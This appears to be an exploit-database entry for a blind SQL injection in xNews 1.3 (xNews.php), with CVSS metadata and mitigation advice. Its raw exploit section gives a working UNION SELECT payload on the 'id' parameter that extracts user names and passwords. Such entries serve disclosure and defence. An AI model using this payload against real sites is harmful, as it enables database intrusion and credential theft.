xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability

vendor:

xNews

by:

ajann

7.5

CVSS

HIGH

Remote Blind SQL Injection

CWE

Product Name: xNews

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability

This vulnerability allows an attacker to perform blind SQL injection in the xNews.php file of the xNews 1.3 application. By manipulating the 'id' parameter in the URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.x-dev.de
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//xNews.php?act=shownews&id=[SQL]

Example:

//xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user/**/where/**/id%20like%201/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-28]